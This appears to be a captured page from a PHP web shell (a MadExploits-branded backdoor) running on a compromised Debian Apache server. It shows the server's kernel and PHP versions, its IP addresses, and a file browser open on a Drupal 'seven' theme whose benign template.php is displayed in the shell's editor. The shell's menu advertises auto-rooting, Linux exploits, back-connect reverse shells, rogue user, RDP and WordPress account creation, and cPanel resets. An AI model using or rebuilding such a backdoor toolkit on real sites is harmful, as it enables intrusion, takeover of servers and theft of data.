Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.129.253.21
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
themes /
seven /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
ie.css
304
B
-rw-r--r--
ie6.css
268
B
-rw-r--r--
ie7.css
368
B
-rw-r--r--
jquery.ui.theme.css
14.88
KB
-rw-r--r--
logo.png
3.81
KB
-rw-r--r--
maintenance-page.tpl.php
1.28
KB
-rw-r--r--
page.tpl.php
1.1
KB
-rw-r--r--
reset.css
2.88
KB
-rw-r--r--
screenshot.png
12.01
KB
-rw-r--r--
seven.info
552
B
-rw-r--r--
style-rtl.css
3.67
KB
-rw-r--r--
style.css
18.02
KB
-rw-r--r--
template.php
4.6
KB
-rw-r--r--
vertical-tabs-rtl.css
506
B
-rw-r--r--
vertical-tabs.css
2.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template.php
<?php /** * Override or insert variables into the maintenance page template. */ function seven_preprocess_maintenance_page(&$vars) { // While markup for normal pages is split into page.tpl.php and html.tpl.php, // the markup for the maintenance page is all in the single // maintenance-page.tpl.php template. So, to have what's done in // seven_preprocess_html() also happen on the maintenance page, it has to be // called here. seven_preprocess_html($vars); } /** * Override or insert variables into the html template. */ function seven_preprocess_html(&$vars) { // Add conditional CSS for IE8 and below. drupal_add_css(path_to_theme() . '/ie.css', array('group' => CSS_THEME, 'browsers' => array('IE' => 'lte IE 8', '!IE' => FALSE), 'weight' => 999, 'preprocess' => FALSE)); // Add conditional CSS for IE7 and below. drupal_add_css(path_to_theme() . '/ie7.css', array('group' => CSS_THEME, 'browsers' => array('IE' => 'lte IE 7', '!IE' => FALSE), 'weight' => 999, 'preprocess' => FALSE)); // Add conditional CSS for IE6. drupal_add_css(path_to_theme() . '/ie6.css', array('group' => CSS_THEME, 'browsers' => array('IE' => 'lte IE 6', '!IE' => FALSE), 'weight' => 999, 'preprocess' => FALSE)); } /** * Override or insert variables into the page template. */ function seven_preprocess_page(&$vars) { $vars['primary_local_tasks'] = $vars['tabs']; unset($vars['primary_local_tasks']['#secondary']); $vars['secondary_local_tasks'] = array( '#theme' => 'menu_local_tasks', '#secondary' => $vars['tabs']['#secondary'], ); } /** * Display the list of available node types for node creation. */ function seven_node_add_list($variables) { $content = $variables['content']; $output = ''; if ($content) { $output = '<ul class="admin-list">'; foreach ($content as $item) { $output .= '<li class="clearfix">'; $output .= '<span class="label">' . l($item['title'], $item['href'], $item['localized_options']) . '</span>'; $output .= '<div class="description">' . filter_xss_admin($item['description']) . '</div>'; $output .= '</li>'; } $output .= '</ul>'; } else { $output = '<p>' . t('You have not created any content types yet. Go to the <a href="@create-content">content type creation page</a> to add a new content type.', array('@create-content' => url('admin/structure/types/add'))) . '</p>'; } return $output; } /** * Overrides theme_admin_block_content(). * * Use unordered list markup in both compact and extended mode. */ function seven_admin_block_content($variables) { $content = $variables['content']; $output = ''; if (!empty($content)) { $output = system_admin_compact_mode() ? '<ul class="admin-list compact">' : '<ul class="admin-list">'; foreach ($content as $item) { $output .= '<li class="leaf">'; $output .= l($item['title'], $item['href'], $item['localized_options']); if (isset($item['description']) && !system_admin_compact_mode()) { $output .= '<div class="description">' . filter_xss_admin($item['description']) . '</div>'; } $output .= '</li>'; } $output .= '</ul>'; } return $output; } /** * Override of theme_tablesort_indicator(). * * Use our own image versions, so they show up as black and not gray on gray. */ function seven_tablesort_indicator($variables) { $style = $variables['style']; $theme_path = drupal_get_path('theme', 'seven'); if ($style == 'asc') { return theme('image', array('path' => $theme_path . '/images/arrow-asc.png', 'alt' => t('sort ascending'), 'width' => 13, 'height' => 13, 'title' => t('sort ascending'))); } else { return theme('image', array('path' => $theme_path . '/images/arrow-desc.png', 'alt' => t('sort descending'), 'width' => 13, 'height' => 13, 'title' => t('sort descending'))); } } /** * Implements hook_css_alter(). */ function seven_css_alter(&$css) { // Use Seven's vertical tabs style instead of the default one. if (isset($css['misc/vertical-tabs.css'])) { $css['misc/vertical-tabs.css']['data'] = drupal_get_path('theme', 'seven') . '/vertical-tabs.css'; $css['misc/vertical-tabs.css']['type'] = 'file'; } if (isset($css['misc/vertical-tabs-rtl.css'])) { $css['misc/vertical-tabs-rtl.css']['data'] = drupal_get_path('theme', 'seven') . '/vertical-tabs-rtl.css'; $css['misc/vertical-tabs-rtl.css']['type'] = 'file'; } // Use Seven's jQuery UI theme style instead of the default one. if (isset($css['misc/ui/jquery.ui.theme.css'])) { $css['misc/ui/jquery.ui.theme.css']['data'] = drupal_get_path('theme', 'seven') . '/jquery.ui.theme.css'; $css['misc/ui/jquery.ui.theme.css']['type'] = 'file'; } }
Close